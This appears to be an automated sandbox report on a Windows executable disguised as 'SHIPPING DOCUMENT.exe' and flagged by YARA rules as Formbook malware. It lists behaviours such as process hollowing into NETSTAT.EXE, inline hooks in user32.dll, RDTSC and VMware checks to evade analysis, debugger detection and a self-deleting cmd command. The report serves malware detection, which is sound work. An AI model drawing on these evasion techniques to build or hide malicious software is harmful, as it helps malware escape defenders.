          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/4@4/5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | File created: C:\Users\user\AppData\Local\Temp\nseA920.tmp
          Source: SHIPPING DOCUMENT.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: SHIPPING DOCUMENT.exe | Virustotal: Detection: 34%
          Source: SHIPPING DOCUMENT.exe | ReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | File read: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
          Source: unknown | Process created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Process created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Process created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: SHIPPING DOCUMENT.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Unpacked PE file: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041E560 push ss; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0391D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDCF6C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDCF0B push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDCF02 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDE560 push ss; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe File created: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE6
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002DC98E4 second address: 0000000002DC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002DC9B5E second address: 0000000002DC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 5192 Thread sleep count: 38 > 30
          Source: C:\Windows\explorer.exe TID: 5192 Thread sleep time: -76000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6944 Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680284032.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.926975780.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.924340020.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.680444387.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.680488183.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_022B182F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_022B1617 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FE87 mov eax, dword ptr fs:[00000030h]
